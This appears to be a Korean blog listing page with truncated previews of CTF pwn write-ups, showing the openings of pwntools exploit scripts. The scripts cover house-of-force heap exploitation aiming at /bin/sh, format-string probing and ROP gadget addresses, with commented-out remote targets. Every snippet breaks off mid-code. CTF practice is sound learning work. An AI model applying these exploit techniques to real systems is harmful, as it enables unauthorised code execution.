hOwDayS 선린 10720
house_of_force 이용 하장마지막에 /bin/sh exploit.py 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162from pwn import * p = process("./my_house")#p = remote("49.236.136.140",13000)e = ELF("./my_house") p.recv()p.send("A" * 256)p.recv() def hexdemical_c(c): a = process("./he_x") a.sendline(str(c)) return a.recv(8)#0xfc p.send("%x %x %x")p.r..
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263from pwn import * p = process("./easy_of_the_easy")#p = remote("49.236.136.140",14000)e = ELF("./easy_of_the_easy")pr = 0x080483f9pppr = 0x080489e9bss = 0x0804a040 +100 for i in range(0,200): p.recv() p.sendline("1") p.sendline("1") p.sendline("0") p.sendline("3")p.sendline("18899..
많이 돌려봐야 된다 주소가 0x00 에 배치되길 기다리며 RTJ 를 한다 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104from pwn import *import timeimport sys pppr = 0x080486f9#pppr = 0x8048693pr = 0x08048361main = 0x8048522 context.terminal = ['gnome-terminal','-x','sh','..